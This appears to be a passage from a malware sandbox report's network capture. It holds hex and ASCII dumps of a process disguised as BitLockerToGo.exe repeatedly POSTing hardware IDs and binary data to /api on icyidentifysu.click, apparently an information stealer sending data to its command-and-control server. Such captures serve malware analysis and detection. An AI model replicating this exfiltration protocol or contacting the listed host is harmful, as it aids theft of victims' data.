2024-12-27 22:58:33 UTC	1369	IN	Data Raw: 6d 33 7a 4e 44 6f 46 6e 31 6b 52 39 67 6f 64 32 64 73 65 2f 49 47 4b 57 77 4a 71 42 45 46 54 58 38 65 42 48 57 49 68 78 75 32 36 6d 48 63 42 69 61 58 75 36 50 42 57 4b 2f 30 64 71 6d 71 4e 5a 58 70 62 52 67 39 77 64 64 64 37 4a 36 43 70 6c 39 58 55 37 5a 70 59 52 6e 48 59 4d 61 2b 38 34 54 4c 62 62 58 6e 66 62 68 31 31 61 6a 73 57 62 71 44 42 59 79 39 32 38 5a 30 43 67 51 62 73 53 73 69 48 41 51 6c 56 44 75 6a 77 42 70 76 4e 62 62 72 71 47 52 46 75 4b 37 66 72 68 63 58 52 72 33 62 52 58 56 4d 31 39 55 69 62 6e 4a 61 6c 43 56 56 71 54 59 53 6d 57 30 32 4e 36 6c 72 74 4a 51 71 61 35 6d 36 67 49 51 50 4f 42 37 46 39 63 76 48 6e 7a 44 71 49 46 77 47 5a 6c 54 34 59 63 4f 4c 66 2b 62 32 72 62 68 69 52 69 44 73 57 33 30 44 67 6f 35 73 6d 4a 63 77 47 55 61 59 6f Data Ascii: m3zNDoFn1kR9god2dse/IGKWwJqBEFTX8eBHWIhxu26mHcBiaXu6PBWK/0dqmqNZXpbRg9wddd7J6Cpl9XU7ZpYRnHYMa+84TLbbXnfbh11ajsWbqDBYy928Z0CgQbsSsiHAQlVDujwBpvNbbrqGRFuK7frhcXRr3bRXVM19UibnJalCVVqTYSmW02N6lrtJQqa5m6gIQPOB7F9cvHnzDqIFwGZlT4YcOLf+b2rbhiRiDsW30Dgo5smJcwGUaYo
2024-12-27 22:58:33 UTC	1369	IN	Data Raw: 48 5a 34 61 71 73 41 4e 64 66 47 44 6e 59 53 69 78 56 75 6f 2f 6c 50 37 43 68 4d 2b 35 44 30 4e 6c 7a 78 64 61 63 58 6d 33 7a 4d 64 6b 31 4c 69 6b 67 56 67 73 74 58 54 6f 61 54 65 55 4b 4b 38 61 2f 30 41 46 6a 4c 78 63 42 62 4c 4c 78 31 6d 7a 4b 65 4e 65 56 44 63 47 75 4f 59 53 6a 58 78 36 73 71 6c 34 2b 52 62 72 4c 4a 68 37 6b 51 43 64 2b 73 39 46 64 56 6c 52 53 37 45 72 6f 4a 32 48 35 4e 51 36 6f 55 41 59 62 6e 56 33 72 79 75 31 56 69 75 74 47 7a 31 43 68 6b 78 2b 33 59 5a 33 79 55 63 5a 49 6e 6f 78 33 51 49 30 67 4b 6b 74 41 31 68 76 4e 53 66 6d 36 4c 66 56 71 57 71 4a 75 64 4b 42 48 6e 31 63 56 4b 42 5a 52 46 6e 79 61 32 4e 64 78 43 56 56 2b 47 44 44 57 36 38 33 4e 65 67 70 74 56 55 71 37 46 67 2b 41 4d 5a 50 4f 42 34 47 39 55 70 58 53 43 4a 6f 5a 38 Data Ascii: HZ4aqsANdfGDnYSixVuo/lP7ChM+5D0NlzxdacXm3zMdk1LikgVgstXToaTeUKK8a/0AFjLxcBbLLx1mzKeNeVDcGuOYSjXx6sql4+RbrLJh7kQCd+s9FdVlRS7EroJ2H5NQ6oUAYbnV3ryu1ViutGz1Chkx+3YZ3yUcZInox3QI0gKktA1hvNSfm6LfVqWqJudKBHn1cVKBZRFnya2NdxCVV+GDDW683NegptVUq7Fg+AMZPOB4G9UpXSCJoZ8
2024-12-27 22:58:33 UTC	1369	IN	Data Raw: 75 4f 4d 53 6a 58 78 30 74 53 38 72 39 39 52 72 37 70 75 2f 77 6f 51 4d 76 52 32 46 64 34 6a 45 47 62 45 6f 34 52 79 46 4a 68 49 35 34 73 41 59 4c 75 62 6b 2b 36 6d 79 52 6a 36 2f 45 48 30 4c 51 30 69 34 47 74 53 78 6d 73 45 4c 73 36 71 78 79 74 51 6b 56 58 74 6a 77 4a 6c 76 74 54 5a 6f 4b 66 58 56 61 65 7a 62 4f 6f 4d 45 7a 54 35 63 68 6e 4c 4a 52 42 71 78 61 4b 50 65 42 72 53 46 4b 53 48 45 69 33 70 6d 2b 69 6a 72 74 46 62 74 50 78 35 74 68 31 64 50 76 34 39 53 70 6b 70 45 32 37 47 71 6f 74 34 47 4a 4e 57 36 6f 63 50 5a 4c 6e 54 7a 36 2b 6c 32 56 6d 73 73 32 66 38 41 52 67 39 39 58 6b 55 31 6d 56 54 4c 73 36 2b 78 79 74 51 76 58 33 52 77 69 74 58 38 63 53 54 74 2b 48 57 56 4f 4c 6b 4a 76 51 48 45 54 48 39 65 78 76 56 4c 78 52 6c 78 61 32 44 66 78 6d 58 Data Ascii: uOMSjXx0tS8r99Rr7pu/woQMvR2Fd4jEGbEo4RyFJhI54sAYLubk+6myRj6/EH0LQ0i4GtSxmsELs6qxytQkVXtjwJlvtTZoKfXVaezbOoMEzT5chnLJRBqxaKPeBrSFKSHEi3pm+ijrtFbtPx5th1dPv49SpkpE27Gqot4GJNW6ocPZLnTz6+l2Vmss2f8ARg99XkU1mVTLs6+xytQvX3RwitX8cSTt+HWVOLkJvQHETH9exvVLxRlxa2DfxmX
2024-12-27 22:58:33 UTC	911	IN	Data Raw: 74 72 6f 39 7a 55 76 4b 2f 63 56 36 71 30 62 2f 6b 41 47 44 54 30 63 52 6a 59 49 68 4e 67 77 65 62 4a 4d 78 65 4b 47 72 7a 41 4b 33 32 71 79 63 75 6a 67 4e 78 58 34 71 4d 6f 34 55 51 61 4e 62 49 6c 55 74 41 33 47 57 50 62 72 34 42 39 48 35 46 49 35 59 30 42 66 37 62 55 32 61 6d 74 31 31 65 6b 76 57 50 79 43 42 6f 38 2b 58 49 65 6d 57 74 64 61 64 48 6d 33 7a 4d 2b 6d 55 6e 7a 67 77 52 6d 70 38 43 64 73 65 2f 49 47 4b 57 77 4a 71 42 45 48 6a 4c 35 65 52 4c 56 4a 52 6c 6a 79 62 53 49 64 42 65 62 55 66 61 4b 44 57 71 36 30 39 61 68 70 38 4e 55 72 4b 35 6a 36 68 5a 64 64 37 4a 36 43 70 6c 39 58 56 6a 4f 74 70 64 77 55 71 4e 4d 35 35 59 42 59 4c 32 62 77 75 43 34 6b 56 2b 75 2f 44 36 34 41 68 49 77 38 58 49 54 30 43 6b 51 61 38 43 6a 68 6e 55 55 6d 46 44 6b 68 Data Ascii: tro9zUvK/cV6q0b/kAGDT0cRjYIhNgwebJMxeKGrzAK32qycujgNxX4qMo4UQaNbIlUtA3GWPbr4B9H5FI5Y0Bf7bU2amt11ekvWPyCBo8+XIemWtdadHm3zM+mUnzgwRmp8Cdse/IGKWwJqBEHjL5eRLVJRljybSIdBebUfaKDWq609ahp8NUrK5j6hZdd7J6Cpl9XVjOtpdwUqNM55YBYL2bwuC4kV+u/D64AhIw8XIT0CkQa8CjhnUUmFDkh
2024-12-27 22:58:33 UTC	1369	IN	Data Raw: 33 34 39 35 0d 0a 2f 62 2f 73 44 46 44 2f 35 66 68 6a 57 49 68 74 71 79 61 32 41 66 52 61 58 55 65 33 41 52 43 32 32 77 35 33 32 34 66 64 37 73 4b 35 55 39 67 63 47 65 65 30 7a 43 35 6b 69 45 53 36 52 35 6f 78 37 48 34 42 66 37 59 67 4f 5a 4c 48 66 31 36 4f 6d 30 56 32 76 75 57 4c 32 41 42 6f 35 2f 6e 49 56 30 53 6f 5a 62 73 62 6d 79 54 4d 58 69 68 71 38 77 43 70 6d 70 2f 72 54 70 62 4f 52 52 2b 79 6c 4a 76 38 49 58 57 47 79 63 78 76 59 4c 52 4e 69 77 61 4b 56 63 78 75 62 56 65 57 50 43 6d 36 77 30 64 57 38 70 39 46 54 71 72 74 75 2f 41 6f 50 4f 50 30 39 58 4a 6b 69 42 53 36 52 35 72 5a 6c 46 35 56 56 70 71 6b 4e 64 72 44 52 33 71 57 74 6b 55 66 73 70 53 62 2f 43 46 31 68 73 6e 41 65 31 43 45 50 59 73 6d 6d 6a 6e 51 61 67 46 58 72 6a 51 6c 74 74 4d 6e 63 Data Ascii: 3495/b/sDFD/5fhjWIhtqya2AfRaXUe3ARC22w5324fd7sK5U9gcGee0zC5kiES6R5ox7H4Bf7YgOZLHf16Om0V2vuWL2ABo5/nIV0SoZbsbmyTMXihq8wCpmp/rTpbORR+ylJv8IXWGycxvYLRNiwaKVcxubVeWPCm6w0dW8p9FTqrtu/AoPOP09XJkiBS6R5rZlF5VVpqkNdrDR3qWtkUfspSb/CF1hsnAe1CEPYsmmjnQagFXrjQlttMnc
2024-12-27 22:58:33 UTC	1369	IN	Data Raw: 53 6a 75 32 48 7a 46 68 59 72 2b 58 55 52 31 79 30 55 62 73 65 6d 68 6e 34 51 30 68 53 6b 68 78 49 74 36 5a 76 34 6a 62 62 48 55 75 43 66 63 65 34 4f 47 6a 58 6b 64 68 50 61 4d 78 42 2b 69 65 6a 48 59 68 65 44 47 72 79 57 47 6e 71 32 78 4a 4f 33 34 64 5a 55 34 75 51 6d 38 77 73 54 4e 50 6c 35 47 39 77 74 48 6d 76 4d 72 49 74 2f 45 5a 70 54 37 6f 55 50 61 37 76 59 30 36 47 67 33 56 79 72 73 6d 2b 34 53 6c 30 2b 36 6a 31 4b 6d 52 4d 4e 61 64 47 72 6c 7a 45 69 6b 55 76 31 6c 51 64 39 74 35 6e 79 72 61 33 53 58 61 57 73 4a 75 64 4b 42 48 6e 31 63 56 4b 42 5a 52 31 71 78 61 57 41 66 52 2b 66 56 65 4f 4c 42 57 65 2f 79 64 4b 72 71 64 31 51 72 36 35 73 38 68 59 55 4d 50 39 7a 47 73 73 6d 58 53 43 4a 6f 5a 38 7a 53 4e 4a 6f 37 6f 4d 47 65 37 7a 55 6e 62 48 76 79 Data Ascii: Sju2HzFhYr+XUR1y0Ubsemhn4Q0hSkhxIt6Zv4jbbHUuCfce4OGjXkdhPaMxB+iejHYheDGryWGnq2xJO34dZU4uQm8wsTNPl5G9wtHmvMrIt/EZpT7oUPa7vY06Gg3Vyrsm+4Sl0+6j1KmRMNadGrlzEikUv1lQd9t5nyra3SXaWsJudKBHn1cVKBZR1qxaWAfR+fVeOLBWe/ydKrqd1Qr65s8hYUMP9zGssmXSCJoZ8zSNJo7oMGe7zUnbHvy
2024-12-27 22:58:33 UTC	1369	IN	Data Raw: 79 2f 77 6f 62 4f 62 49 7a 55 74 5a 6c 52 56 65 4a 37 73 64 4d 58 74 4a 43 70 4e 68 4b 57 4c 4c 56 30 36 6d 33 77 42 57 42 71 33 44 79 48 31 38 66 39 57 77 62 7a 79 67 50 4c 6f 66 6d 67 54 4e 49 77 68 53 6b 68 42 73 74 36 59 75 50 39 66 53 43 44 2f 4c 75 65 62 59 64 58 53 2b 79 4a 55 43 58 5a 51 38 75 6b 65 62 41 63 41 4b 41 58 4f 65 57 43 53 71 50 35 66 32 6c 74 39 42 56 71 62 42 59 78 68 45 65 4e 2f 78 36 42 4d 68 6c 55 79 37 47 35 74 39 4b 55 4e 6f 61 32 38 35 4b 64 66 47 44 6e 5a 75 69 33 31 61 6c 71 6e 65 31 4a 42 59 76 38 33 41 5a 31 57 63 63 59 39 6d 68 78 7a 31 51 6c 42 71 38 30 45 51 74 74 63 71 64 39 76 47 44 41 2f 66 76 4d 61 68 57 41 6e 66 72 50 51 53 5a 66 55 38 67 69 62 54 48 4b 31 44 56 57 66 61 53 44 47 36 6e 32 4a 71 51 6e 2f 46 54 72 72 Data Ascii: y/wobObIzUtZlRVeJ7sdMXtJCpNhKWLLV06m3wBWBq3DyH18f9WwbzygPLofmgTNIwhSkhBst6YuP9fSCD/LuebYdXS+yJUCXZQ8ukebAcAKAXOeWCSqP5f2lt9BVqbBYxhEeN/x6BMhlUy7G5t9KUNoa285KdfGDnZui31alqne1JBYv83AZ1WccY9mhxz1QlBq80EQttcqd9vGDA/fvMahWAnfrPQSZfU8gibTHK1DVWfaSDG6n2JqQn/FTrr
2024-12-27 22:58:33 UTC	1369	IN	Data Raw: 58 54 33 6a 50 55 71 4a 64 30 59 37 6d 76 48 58 49 51 2f 63 51 36 53 57 53 6a 58 6a 6c 5a 32 38 34 59 6b 59 35 62 39 30 36 67 49 65 4c 2f 45 36 4c 4f 63 44 48 6d 6e 50 70 59 6c 6b 41 64 42 31 35 34 73 47 59 62 62 4e 34 35 43 30 30 6c 61 73 75 33 44 70 52 46 4e 35 2f 54 31 4b 34 47 55 4d 5a 4d 37 71 7a 7a 38 42 67 56 54 76 6c 67 30 74 6a 70 57 64 74 75 47 4a 47 4a 65 2f 61 50 59 44 43 79 69 2f 57 78 48 65 49 78 35 67 33 72 66 48 50 56 43 55 47 72 7a 53 52 43 32 31 79 70 33 32 38 59 4d 44 39 2b 38 78 71 46 59 43 64 2b 73 39 42 4a 6c 39 54 69 43 4a 74 4d 63 72 55 4e 56 55 36 59 45 4a 59 37 4c 4a 7a 36 69 69 78 31 76 6c 67 6c 6a 64 43 52 41 38 2f 48 6f 73 35 77 51 58 66 73 53 70 67 45 30 75 70 55 76 6a 6b 45 68 4c 73 73 33 65 37 75 2b 52 51 4f 4c 6b 4a 74 6b Data Ascii: XT3jPUqJd0Y7mvHXIQ/cQ6SWSjXjlZ284YkY5b906gIeL/E6LOcDHmnPpYlkAdB154sGYbbN45C00lasu3DpRFN5/T1K4GUMZM7qzz8BgVTvlg0tjpWdtuGJGJe/aPYDCyi/WxHeIx5g3rfHPVCUGrzSRC21yp328YMD9+8xqFYCd+s9BJl9TiCJtMcrUNVU6YEJY7LJz6iix1vlgljdCRA8/Hos5wQXfsSpgE0upUvjkEhLss3e7u+RQOLkJtk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	104.21.29.252	443	7120	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:58:35 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TVXMSYXT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18110 Host: icyidentifysu.click
2024-12-27 22:58:35 UTC	15331	OUT	Data Raw: 2d 2d 54 56 58 4d 53 59 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 30 46 43 41 37 42 39 41 33 30 31 42 32 44 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 54 56 58 4d 53 59 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 56 58 4d 53 59 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 6b 74 67 74 70 71 76 73 6f 75 61 0d 0a 2d 2d 54 56 58 4d 53 59 58 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --TVXMSYXTContent-Disposition: form-data; name="hwid"B70FCA7B9A301B2DC683EA0F4CB0333A--TVXMSYXTContent-Disposition: form-data; name="pid"2--TVXMSYXTContent-Disposition: form-data; name="lid"LPnhqo--bktgtpqvsoua--TVXMSYXTContent-D
2024-12-27 22:58:35 UTC	2779	OUT	Data Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
2024-12-27 22:58:36 UTC	1136	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:58:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hv6b83k6j98ehukoraj44hooq6; expires=Tue, 22 Apr 2025 16:45:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UgQDZixV2GnsznXCohDn%2FY9w2eibS%2BE3otis78X3VN3FM3Na0%2F8K%2Fu%2FEseoTHG6lzl2myeiDd%2BsfyhzoZOPJ85dprBWiLDaM27stALLHwdRrXDceUgd5YSjwsYkYB5xg3XnwufY8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cea8d0824de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1728&min_rtt=1721&rtt_var=651&sent=12&recv=22&lost=0&retrans=0&sent_bytes=2851&recv_bytes=19065&delivery_rate=1696687&cwnd=240&unsent_bytes=0&cid=df622476cb54d457&ts=1111&x=0"
2024-12-27 22:58:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:58:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	104.21.29.252	443	7120	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:58:38 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6OILA88KW08UIH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8767 Host: icyidentifysu.click
2024-12-27 22:58:38 UTC	8767	OUT	Data Raw: 2d 2d 36 4f 49 4c 41 38 38 4b 57 30 38 55 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 30 46 43 41 37 42 39 41 33 30 31 42 32 44 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 36 4f 49 4c 41 38 38 4b 57 30 38 55 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4f 49 4c 41 38 38 4b 57 30 38 55 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 6b 74 67 74 70 71 76 73 6f 75 61 0d 0a 2d 2d 36 Data Ascii: --6OILA88KW08UIHContent-Disposition: form-data; name="hwid"B70FCA7B9A301B2DC683EA0F4CB0333A--6OILA88KW08UIHContent-Disposition: form-data; name="pid"2--6OILA88KW08UIHContent-Disposition: form-data; name="lid"LPnhqo--bktgtpqvsoua--6
2024-12-27 22:58:38 UTC	1126	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:58:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fbodk2icin02da60q2u3sphma5; expires=Tue, 22 Apr 2025 16:45:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RCJdSHF6inSnJKPSTIooYcbgzc23%2B2VQRKcR4z1dD6yupVAApay1sSF7p5cRfexaC%2BueolXrSJDJOPU1QJZyy0Ei4PZhvqxgbcZEg1vEN2mioM2tXPpehSXDwSwnUwDrcb75JUH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cea9c88908c4b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9948&min_rtt=1823&rtt_var=5671&sent=9&recv=13&lost=0&retrans=0&sent_bytes=2852&recv_bytes=9705&delivery_rate=1601755&cwnd=232&unsent_bytes=0&cid=8cef3f37264fac6b&ts=774&x=0"
2024-12-27 22:58:38 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:58:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	104.21.29.252	443	7120	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:58:40 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7ZCLH0SUATFAO0O User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20426 Host: icyidentifysu.click
2024-12-27 22:58:40 UTC	15331	OUT	Data Raw: 2d 2d 37 5a 43 4c 48 30 53 55 41 54 46 41 4f 30 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 30 46 43 41 37 42 39 41 33 30 31 42 32 44 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 37 5a 43 4c 48 30 53 55 41 54 46 41 4f 30 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 5a 43 4c 48 30 53 55 41 54 46 41 4f 30 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 6b 74 67 74 70 71 76 73 6f 75 61 0d 0a Data Ascii: --7ZCLH0SUATFAO0OContent-Disposition: form-data; name="hwid"B70FCA7B9A301B2DC683EA0F4CB0333A--7ZCLH0SUATFAO0OContent-Disposition: form-data; name="pid"3--7ZCLH0SUATFAO0OContent-Disposition: form-data; name="lid"LPnhqo--bktgtpqvsoua
2024-12-27 22:58:40 UTC	5095	OUT	Data Raw: 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 Data Ascii: M?lrQMn 64F6(X&7~`aO
2024-12-27 22:58:41 UTC	1135	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ckiq0o73d100j13r088qv73kh1; expires=Tue, 22 Apr 2025 16:45:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hRRPaQOFg0HRxXuFaPSxWkyjtw%2BwVAdT8QbJxWNNCGH8KhhcH5gp8v%2FljVwdfDz%2Fqoakth3N%2Bu2aoCusAUTQV%2FDDplgZkVXH4UjJxMXDEX1RL30KpGBa4iZJimJxslbGnYq%2BP27D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8ceaaa58010c82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1521&rtt_var=581&sent=16&recv=24&lost=0&retrans=0&sent_bytes=2851&recv_bytes=21388&delivery_rate=1919789&cwnd=208&unsent_bytes=0&cid=d620bbe34f87dee3&ts=978&x=0"
2024-12-27 22:58:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:58:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.29.252	443	7120	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:58:42 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RAM8QHLHYL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1211 Host: icyidentifysu.click
2024-12-27 22:58:42 UTC	1211	OUT	Data Raw: 2d 2d 52 41 4d 38 51 48 4c 48 59 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 37 30 46 43 41 37 42 39 41 33 30 31 42 32 44 43 36 38 33 45 41 30 46 34 43 42 30 33 33 33 41 0d 0a 2d 2d 52 41 4d 38 51 48 4c 48 59 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 41 4d 38 51 48 4c 48 59 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 62 6b 74 67 74 70 71 76 73 6f 75 61 0d 0a 2d 2d 52 41 4d 38 51 48 4c 48 59 4c 0d 0a 43 Data Ascii: --RAM8QHLHYLContent-Disposition: form-data; 